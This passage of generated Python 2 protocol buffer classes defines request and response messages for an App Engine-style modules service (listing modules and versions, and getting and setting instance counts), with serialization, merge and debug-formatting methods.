  Do not edit by hand -- regenerate from the .proto instead.
  """

  # ErrorCode enum values returned by the modules service.
  OK = 0
  INVALID_MODULE = 1
  INVALID_VERSION = 2
  INVALID_INSTANCES = 3
  TRANSIENT_ERROR = 4
  UNEXPECTED_STATE = 5

  _ErrorCode_NAMES = {
    0: "OK",
    1: "INVALID_MODULE",
    2: "INVALID_VERSION",
    3: "INVALID_INSTANCES",
    4: "TRANSIENT_ERROR",
    5: "UNEXPECTED_STATE",
  }

  # Map an ErrorCode value to its symbolic name ("" if unknown).
  def ErrorCode_Name(cls, x): return cls._ErrorCode_NAMES.get(x, "")
  ErrorCode_Name = classmethod(ErrorCode_Name)

  def __init__(self, contents=None):
    # No fields to initialize; optionally parse serialized `contents`.
    pass
    if contents is not None: self.MergeFromString(contents)

  def MergeFrom(self, x):
    # Nothing to merge for a fieldless message.
    assert x is not self

  def Equals(self, x):
    # All instances are equal: there are no fields to compare.
    if x is self: return 1
    return 1

  def IsInitialized(self, debug_strs=None):
    # No required fields, so always initialized.
    initialized = 1
    return initialized

  def ByteSize(self):
    # Serialized size is always zero bytes.
    n = 0
    return n

  def ByteSizePartial(self):
    n = 0
    return n

  def Clear(self):
    pass

  def OutputUnchecked(self, out):
    pass

  def OutputPartial(self, out):
    pass

  def TryMerge(self, d):
    # Skip every tag in the wire data; tag 0 is malformed input.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)

  def __str__(self, prefix="", printElemNumber=0):
    res=""
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
  }, 0)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
  }, 0, ProtocolBuffer.Encoder.MAX_TYPE)

  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.ModulesServiceError'
class GetModulesRequest(ProtocolBuffer.ProtocolMessage):
  """Generated protobuf message apphosting.GetModulesRequest (no fields).

  Do not edit by hand -- regenerate from the .proto instead.
  """

  def __init__(self, contents=None):
    # No fields to initialize; optionally parse serialized `contents`.
    pass
    if contents is not None: self.MergeFromString(contents)

  def MergeFrom(self, x):
    # Nothing to merge for a fieldless message.
    assert x is not self

  def Equals(self, x):
    # All instances are equal: there are no fields to compare.
    if x is self: return 1
    return 1

  def IsInitialized(self, debug_strs=None):
    # No required fields, so always initialized.
    initialized = 1
    return initialized

  def ByteSize(self):
    # Serialized size is always zero bytes.
    n = 0
    return n

  def ByteSizePartial(self):
    n = 0
    return n

  def Clear(self):
    pass

  def OutputUnchecked(self, out):
    pass

  def OutputPartial(self, out):
    pass

  def TryMerge(self, d):
    # Skip every tag in the wire data; tag 0 is malformed input.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)

  def __str__(self, prefix="", printElemNumber=0):
    res=""
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
  }, 0)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
  }, 0, ProtocolBuffer.Encoder.MAX_TYPE)

  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.GetModulesRequest'
class GetModulesResponse(ProtocolBuffer.ProtocolMessage):
  """Generated protobuf message apphosting.GetModulesResponse.

  One repeated string field: `module` (wire tag 1).
  Do not edit by hand -- regenerate from the .proto instead.
  """

  def __init__(self, contents=None):
    # module_ holds the repeated string values.
    self.module_ = []
    if contents is not None: self.MergeFromString(contents)

  # -- Repeated `module` field accessors --

  def module_size(self): return len(self.module_)

  def module_list(self): return self.module_

  def module(self, i):
    return self.module_[i]

  def set_module(self, i, x):
    self.module_[i] = x

  def add_module(self, x):
    self.module_.append(x)

  def clear_module(self):
    self.module_ = []

  def MergeFrom(self, x):
    # Append x's module values onto this message's list.
    assert x is not self
    for i in xrange(x.module_size()): self.add_module(x.module(i))

  def Equals(self, x):
    # Element-wise comparison of the repeated field.
    if x is self: return 1
    if len(self.module_) != len(x.module_): return 0
    for e1, e2 in zip(self.module_, x.module_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # No required fields, so always initialized.
    initialized = 1
    return initialized

  def ByteSize(self):
    # 1 byte of tag per element plus each length-prefixed string.
    n = 0
    n += 1 * len(self.module_)
    for i in xrange(len(self.module_)): n += self.lengthString(len(self.module_[i]))
    return n

  def ByteSizePartial(self):
    n = 0
    n += 1 * len(self.module_)
    for i in xrange(len(self.module_)): n += self.lengthString(len(self.module_[i]))
    return n

  def Clear(self):
    self.clear_module()

  def OutputUnchecked(self, out):
    # 10 == (field 1 << 3) | wire type 2 (length-delimited).
    for i in xrange(len(self.module_)):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_[i])

  def OutputPartial(self, out):
    for i in xrange(len(self.module_)):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_[i])

  def TryMerge(self, d):
    # Collect tag-10 strings into module_; skip unknown tags; tag 0 is
    # malformed input.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.add_module(d.getPrefixedString())
        continue
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)

  def __str__(self, prefix="", printElemNumber=0):
    # Debug text form: one "module: <value>" line per element.
    res=""
    cnt=0
    for e in self.module_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("module%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kmodule = 1

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "module",
  }, 1)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
  }, 1, ProtocolBuffer.Encoder.MAX_TYPE)

  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.GetModulesResponse'
class GetVersionsRequest(ProtocolBuffer.ProtocolMessage):
  """Request for ModulesService.GetVersions.

  Generated message with one optional string field: module = 1.
  """

  # Presence bit and default value for the optional `module` field.
  has_module_ = 0
  module_ = ""

  def __init__(self, contents=None):
    # Optionally decode from a serialized byte string.
    if contents is not None: self.MergeFromString(contents)

  def module(self): return self.module_
  def set_module(self, x):
    self.has_module_ = 1
    self.module_ = x
  def clear_module(self):
    # Only reset when set, so unset instances keep sharing the class default.
    if self.has_module_:
      self.has_module_ = 0
      self.module_ = ""
  def has_module(self): return self.has_module_

  def MergeFrom(self, x):
    """Copy set fields from another GetVersionsRequest into self."""
    assert x is not self
    if (x.has_module()): self.set_module(x.module())
  def Equals(self, x):
    """Field-wise equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if self.has_module_ != x.has_module_: return 0
    if self.has_module_ and self.module_ != x.module_: return 0
    return 1
  def IsInitialized(self, debug_strs=None):
    # All fields optional, so always initialized.
    initialized = 1
    return initialized
  def ByteSize(self):
    # 1 tag byte plus length-prefixed string payload, when present.
    n = 0
    if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
    return n
  def ByteSizePartial(self):
    n = 0
    if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
    return n
  def Clear(self):
    self.clear_module()
  def OutputUnchecked(self, out):
    # Tag 10 = (field 1 << 3) | wire type 2 (length-delimited).
    if (self.has_module_):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_)
  def OutputPartial(self, out):
    if (self.has_module_):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_)
  def TryMerge(self, d):
    """Decode fields from decoder `d`, skipping unknown tags."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_module(d.getPrefixedString())
        continue
      # Tag 0 is never valid: the stream is corrupt.
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)
  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a sparse {tag: value} map into a tuple indexed by tag number.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field number constants and tag lookup tables used by the runtime.
  kmodule = 1
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "module",
  }, 1)
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
  }, 1, ProtocolBuffer.Encoder.MAX_TYPE)
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.GetVersionsRequest'
class GetVersionsResponse(ProtocolBuffer.ProtocolMessage):
  """Response for ModulesService.GetVersions.

  Generated message with a single repeated string field: version = 1.
  """

  def __init__(self, contents=None):
    # Backing list for the repeated `version` field.
    self.version_ = []
    if contents is not None: self.MergeFromString(contents)

  def version_size(self): return len(self.version_)
  def version_list(self): return self.version_
  def version(self, i):
    return self.version_[i]
  def set_version(self, i, x):
    self.version_[i] = x
  def add_version(self, x):
    self.version_.append(x)
  def clear_version(self):
    self.version_ = []

  def MergeFrom(self, x):
    """Append every version entry of `x` onto self."""
    assert x is not self
    for i in xrange(x.version_size()): self.add_version(x.version(i))
  def Equals(self, x):
    """Element-wise equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if len(self.version_) != len(x.version_): return 0
    for e1, e2 in zip(self.version_, x.version_):
      if e1 != e2: return 0
    return 1
  def IsInitialized(self, debug_strs=None):
    # No required fields, so always initialized.
    initialized = 1
    return initialized
  def ByteSize(self):
    # One tag byte per element plus each length-prefixed string payload.
    n = 0
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthString(len(self.version_[i]))
    return n
  def ByteSizePartial(self):
    n = 0
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthString(len(self.version_[i]))
    return n
  def Clear(self):
    self.clear_version()
  def OutputUnchecked(self, out):
    # Tag 10 = (field 1 << 3) | wire type 2 (length-delimited).
    for i in xrange(len(self.version_)):
      out.putVarInt32(10)
      out.putPrefixedString(self.version_[i])
  def OutputPartial(self, out):
    for i in xrange(len(self.version_)):
      out.putVarInt32(10)
      out.putPrefixedString(self.version_[i])
  def TryMerge(self, d):
    """Decode fields from decoder `d`, skipping unknown tags."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.add_version(d.getPrefixedString())
        continue
      # Tag 0 is never valid: the stream is corrupt.
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)
  def __str__(self, prefix="", printElemNumber=0):
    res=""
    cnt=0
    for e in self.version_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("version%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a sparse {tag: value} map into a tuple indexed by tag number.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field number constants and tag lookup tables used by the runtime.
  kversion = 1
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "version",
  }, 1)
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
  }, 1, ProtocolBuffer.Encoder.MAX_TYPE)
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.GetVersionsResponse'
class GetDefaultVersionRequest(ProtocolBuffer.ProtocolMessage):
  """Request for ModulesService.GetDefaultVersion.

  Generated message with one optional string field: module = 1.
  """

  # Presence bit and default value for the optional `module` field.
  has_module_ = 0
  module_ = ""

  def __init__(self, contents=None):
    # Optionally decode from a serialized byte string.
    if contents is not None: self.MergeFromString(contents)

  def module(self): return self.module_
  def set_module(self, x):
    self.has_module_ = 1
    self.module_ = x
  def clear_module(self):
    # Only reset when set, so unset instances keep sharing the class default.
    if self.has_module_:
      self.has_module_ = 0
      self.module_ = ""
  def has_module(self): return self.has_module_

  def MergeFrom(self, x):
    """Copy set fields from another GetDefaultVersionRequest into self."""
    assert x is not self
    if (x.has_module()): self.set_module(x.module())
  def Equals(self, x):
    """Field-wise equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if self.has_module_ != x.has_module_: return 0
    if self.has_module_ and self.module_ != x.module_: return 0
    return 1
  def IsInitialized(self, debug_strs=None):
    # All fields optional, so always initialized.
    initialized = 1
    return initialized
  def ByteSize(self):
    # 1 tag byte plus length-prefixed string payload, when present.
    n = 0
    if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
    return n
  def ByteSizePartial(self):
    n = 0
    if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
    return n
  def Clear(self):
    self.clear_module()
  def OutputUnchecked(self, out):
    # Tag 10 = (field 1 << 3) | wire type 2 (length-delimited).
    if (self.has_module_):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_)
  def OutputPartial(self, out):
    if (self.has_module_):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_)
  def TryMerge(self, d):
    """Decode fields from decoder `d`, skipping unknown tags."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_module(d.getPrefixedString())
        continue
      # Tag 0 is never valid: the stream is corrupt.
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)
  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a sparse {tag: value} map into a tuple indexed by tag number.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field number constants and tag lookup tables used by the runtime.
  kmodule = 1
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "module",
  }, 1)
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
  }, 1, ProtocolBuffer.Encoder.MAX_TYPE)
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.GetDefaultVersionRequest'
class GetDefaultVersionResponse(ProtocolBuffer.ProtocolMessage):
  """Response for ModulesService.GetDefaultVersion.

  Generated message with one required string field: version = 1.
  """

  # Presence bit and default value for the required `version` field.
  has_version_ = 0
  version_ = ""

  def __init__(self, contents=None):
    # Optionally decode from a serialized byte string.
    if contents is not None: self.MergeFromString(contents)

  def version(self): return self.version_
  def set_version(self, x):
    self.has_version_ = 1
    self.version_ = x
  def clear_version(self):
    # Only reset when set, so unset instances keep sharing the class default.
    if self.has_version_:
      self.has_version_ = 0
      self.version_ = ""
  def has_version(self): return self.has_version_

  def MergeFrom(self, x):
    """Copy set fields from another GetDefaultVersionResponse into self."""
    assert x is not self
    if (x.has_version()): self.set_version(x.version())
  def Equals(self, x):
    """Field-wise equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if self.has_version_ != x.has_version_: return 0
    if self.has_version_ and self.version_ != x.version_: return 0
    return 1
  def IsInitialized(self, debug_strs=None):
    # `version` is required; report it when missing.
    initialized = 1
    if (not self.has_version_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: version not set.')
    return initialized
  def ByteSize(self):
    # Assumes the required field is set: payload length plus 1 tag byte.
    n = 0
    n += self.lengthString(len(self.version_))
    return n + 1
  def ByteSizePartial(self):
    # Unlike ByteSize, tolerates the required field being unset.
    n = 0
    if (self.has_version_):
      n += 1
      n += self.lengthString(len(self.version_))
    return n
  def Clear(self):
    self.clear_version()
  def OutputUnchecked(self, out):
    # Tag 10 = (field 1 << 3) | wire type 2; written unconditionally
    # because the field is required.
    out.putVarInt32(10)
    out.putPrefixedString(self.version_)
  def OutputPartial(self, out):
    if (self.has_version_):
      out.putVarInt32(10)
      out.putPrefixedString(self.version_)
  def TryMerge(self, d):
    """Decode fields from decoder `d`, skipping unknown tags."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_version(d.getPrefixedString())
        continue
      # Tag 0 is never valid: the stream is corrupt.
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)
  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatString(self.version_))
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a sparse {tag: value} map into a tuple indexed by tag number.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field number constants and tag lookup tables used by the runtime.
  kversion = 1
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "version",
  }, 1)
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
  }, 1, ProtocolBuffer.Encoder.MAX_TYPE)
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.GetDefaultVersionResponse'
class GetNumInstancesRequest(ProtocolBuffer.ProtocolMessage):
  """Request for ModulesService.GetNumInstances.

  Generated message with two optional string fields:
  module = 1, version = 2.
  """

  # Presence bits and default values for the optional fields.
  has_module_ = 0
  module_ = ""
  has_version_ = 0
  version_ = ""

  def __init__(self, contents=None):
    # Optionally decode from a serialized byte string.
    if contents is not None: self.MergeFromString(contents)

  def module(self): return self.module_
  def set_module(self, x):
    self.has_module_ = 1
    self.module_ = x
  def clear_module(self):
    # Only reset when set, so unset instances keep sharing the class default.
    if self.has_module_:
      self.has_module_ = 0
      self.module_ = ""
  def has_module(self): return self.has_module_

  def version(self): return self.version_
  def set_version(self, x):
    self.has_version_ = 1
    self.version_ = x
  def clear_version(self):
    if self.has_version_:
      self.has_version_ = 0
      self.version_ = ""
  def has_version(self): return self.has_version_

  def MergeFrom(self, x):
    """Copy set fields from another GetNumInstancesRequest into self."""
    assert x is not self
    if (x.has_module()): self.set_module(x.module())
    if (x.has_version()): self.set_version(x.version())
  def Equals(self, x):
    """Field-wise equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if self.has_module_ != x.has_module_: return 0
    if self.has_module_ and self.module_ != x.module_: return 0
    if self.has_version_ != x.has_version_: return 0
    if self.has_version_ and self.version_ != x.version_: return 0
    return 1
  def IsInitialized(self, debug_strs=None):
    # All fields optional, so always initialized.
    initialized = 1
    return initialized
  def ByteSize(self):
    # 1 tag byte plus length-prefixed payload per set string field.
    n = 0
    if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
    if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
    return n
  def ByteSizePartial(self):
    n = 0
    if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
    if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
    return n
  def Clear(self):
    self.clear_module()
    self.clear_version()
  def OutputUnchecked(self, out):
    # Tags: 10 = field 1, 18 = field 2; both wire type 2 (length-delimited).
    if (self.has_module_):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_)
    if (self.has_version_):
      out.putVarInt32(18)
      out.putPrefixedString(self.version_)
  def OutputPartial(self, out):
    if (self.has_module_):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_)
    if (self.has_version_):
      out.putVarInt32(18)
      out.putPrefixedString(self.version_)
  def TryMerge(self, d):
    """Decode fields from decoder `d`, skipping unknown tags."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_module(d.getPrefixedString())
        continue
      if tt == 18:
        self.set_version(d.getPrefixedString())
        continue
      # Tag 0 is never valid: the stream is corrupt.
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)
  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
    if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatString(self.version_))
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a sparse {tag: value} map into a tuple indexed by tag number.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field number constants and tag lookup tables used by the runtime.
  kmodule = 1
  kversion = 2
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "module",
    2: "version",
  }, 2)
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
  }, 2, ProtocolBuffer.Encoder.MAX_TYPE)
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.GetNumInstancesRequest'
class GetNumInstancesResponse(ProtocolBuffer.ProtocolMessage):
  """Response for ModulesService.GetNumInstances.

  Generated message with one required int64 field: instances = 1.
  """

  # Presence bit and default value for the required `instances` field.
  has_instances_ = 0
  instances_ = 0

  def __init__(self, contents=None):
    # Optionally decode from a serialized byte string.
    if contents is not None: self.MergeFromString(contents)

  def instances(self): return self.instances_
  def set_instances(self, x):
    self.has_instances_ = 1
    self.instances_ = x
  def clear_instances(self):
    # Only reset when set, so unset instances keep sharing the class default.
    if self.has_instances_:
      self.has_instances_ = 0
      self.instances_ = 0
  def has_instances(self): return self.has_instances_

  def MergeFrom(self, x):
    """Copy set fields from another GetNumInstancesResponse into self."""
    assert x is not self
    if (x.has_instances()): self.set_instances(x.instances())
  def Equals(self, x):
    """Field-wise equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if self.has_instances_ != x.has_instances_: return 0
    if self.has_instances_ and self.instances_ != x.instances_: return 0
    return 1
  def IsInitialized(self, debug_strs=None):
    # `instances` is required; report it when missing.
    initialized = 1
    if (not self.has_instances_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: instances not set.')
    return initialized
  def ByteSize(self):
    # Assumes the required field is set: varint length plus 1 tag byte.
    n = 0
    n += self.lengthVarInt64(self.instances_)
    return n + 1
  def ByteSizePartial(self):
    # Unlike ByteSize, tolerates the required field being unset.
    n = 0
    if (self.has_instances_):
      n += 1
      n += self.lengthVarInt64(self.instances_)
    return n
  def Clear(self):
    self.clear_instances()
  def OutputUnchecked(self, out):
    # Tag 8 = (field 1 << 3) | wire type 0 (varint); written
    # unconditionally because the field is required.
    out.putVarInt32(8)
    out.putVarInt64(self.instances_)
  def OutputPartial(self, out):
    if (self.has_instances_):
      out.putVarInt32(8)
      out.putVarInt64(self.instances_)
  def TryMerge(self, d):
    """Decode fields from decoder `d`, skipping unknown tags."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 8:
        self.set_instances(d.getVarInt64())
        continue
      # Tag 0 is never valid: the stream is corrupt.
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)
  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_instances_: res+=prefix+("instances: %s\n" % self.DebugFormatInt64(self.instances_))
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a sparse {tag: value} map into a tuple indexed by tag number.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field number constants and tag lookup tables used by the runtime.
  kinstances = 1
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "instances",
  }, 1)
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.NUMERIC,
  }, 1, ProtocolBuffer.Encoder.MAX_TYPE)
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.GetNumInstancesResponse'
class SetNumInstancesRequest(ProtocolBuffer.ProtocolMessage):
  """Request for ModulesService.SetNumInstances.

  Generated message with optional string fields module = 1 and
  version = 2, and a required int64 field instances = 3.
  """

  # Presence bits and default values for the fields.
  has_module_ = 0
  module_ = ""
  has_version_ = 0
  version_ = ""
  has_instances_ = 0
  instances_ = 0

  def __init__(self, contents=None):
    # Optionally decode from a serialized byte string.
    if contents is not None: self.MergeFromString(contents)

  def module(self): return self.module_
  def set_module(self, x):
    self.has_module_ = 1
    self.module_ = x
  def clear_module(self):
    # Only reset when set, so unset instances keep sharing the class default.
    if self.has_module_:
      self.has_module_ = 0
      self.module_ = ""
  def has_module(self): return self.has_module_

  def version(self): return self.version_
  def set_version(self, x):
    self.has_version_ = 1
    self.version_ = x
  def clear_version(self):
    if self.has_version_:
      self.has_version_ = 0
      self.version_ = ""
  def has_version(self): return self.has_version_

  def instances(self): return self.instances_
  def set_instances(self, x):
    self.has_instances_ = 1
    self.instances_ = x
  def clear_instances(self):
    if self.has_instances_:
      self.has_instances_ = 0
      self.instances_ = 0
  def has_instances(self): return self.has_instances_

  def MergeFrom(self, x):
    """Copy set fields from another SetNumInstancesRequest into self."""
    assert x is not self
    if (x.has_module()): self.set_module(x.module())
    if (x.has_version()): self.set_version(x.version())
    if (x.has_instances()): self.set_instances(x.instances())
  def Equals(self, x):
    """Field-wise equality; returns 1/0 in the generated-code style."""
    if x is self: return 1
    if self.has_module_ != x.has_module_: return 0
    if self.has_module_ and self.module_ != x.module_: return 0
    if self.has_version_ != x.has_version_: return 0
    if self.has_version_ and self.version_ != x.version_: return 0
    if self.has_instances_ != x.has_instances_: return 0
    if self.has_instances_ and self.instances_ != x.instances_: return 0
    return 1
  def IsInitialized(self, debug_strs=None):
    # `instances` is required; report it when missing.
    initialized = 1
    if (not self.has_instances_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: instances not set.')
    return initialized
  def ByteSize(self):
    # Optional strings count only when set; the required varint always
    # contributes its payload plus 1 tag byte.
    n = 0
    if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
    if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
    n += self.lengthVarInt64(self.instances_)
    return n + 1
  def ByteSizePartial(self):
    # Unlike ByteSize, tolerates the required field being unset.
    n = 0
    if (self.has_module_): n += 1 + self.lengthString(len(self.module_))
    if (self.has_version_): n += 1 + self.lengthString(len(self.version_))
    if (self.has_instances_):
      n += 1
      n += self.lengthVarInt64(self.instances_)
    return n
  def Clear(self):
    self.clear_module()
    self.clear_version()
    self.clear_instances()
  def OutputUnchecked(self, out):
    # Tags: 10 = field 1 (string), 18 = field 2 (string),
    # 24 = field 3 (varint, written unconditionally: required).
    if (self.has_module_):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_)
    if (self.has_version_):
      out.putVarInt32(18)
      out.putPrefixedString(self.version_)
    out.putVarInt32(24)
    out.putVarInt64(self.instances_)
  def OutputPartial(self, out):
    if (self.has_module_):
      out.putVarInt32(10)
      out.putPrefixedString(self.module_)
    if (self.has_version_):
      out.putVarInt32(18)
      out.putPrefixedString(self.version_)
    if (self.has_instances_):
      out.putVarInt32(24)
      out.putVarInt64(self.instances_)
  def TryMerge(self, d):
    """Decode fields from decoder `d`, skipping unknown tags."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_module(d.getPrefixedString())
        continue
      if tt == 18:
        self.set_version(d.getPrefixedString())
        continue
      if tt == 24:
        self.set_instances(d.getVarInt64())
        continue
      # Tag 0 is never valid: the stream is corrupt.
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)
  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_module_: res+=prefix+("module: %s\n" % self.DebugFormatString(self.module_))
    if self.has_version_: res+=prefix+("version: %s\n" % self.DebugFormatString(self.version_))
    if self.has_instances_: res+=prefix+("instances: %s\n" % self.DebugFormatInt64(self.instances_))
    return res

  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Densify a sparse {tag: value} map into a tuple indexed by tag number.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field number constants and tag lookup tables used by the runtime.
  kmodule = 1
  kversion = 2
  kinstances = 3
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "module",
    2: "version",
    3: "instances",
  }, 3)
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
  }, 3, ProtocolBuffer.Encoder.MAX_TYPE)
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting.SetNumInstancesRequest'
class SetNumInstancesResponse(ProtocolBuffer.ProtocolMessage):
  """Response for ModulesService.SetNumInstances.

  This message declares no fields, so its wire encoding is always empty.
  """

  def __init__(self, contents=None):
    # Nothing to initialize; optionally decode a serialized payload.
    if contents is not None:
      self.MergeFromString(contents)

  def MergeFrom(self, x):
    """No fields to copy; merging a message into itself is still forbidden."""
    assert x is not self

  def Equals(self, x):
    """Every instance compares equal: there is no field state."""
    return 1

  def IsInitialized(self, debug_strs=None):
    """A fieldless message is always initialized."""
    return 1

  def ByteSize(self):
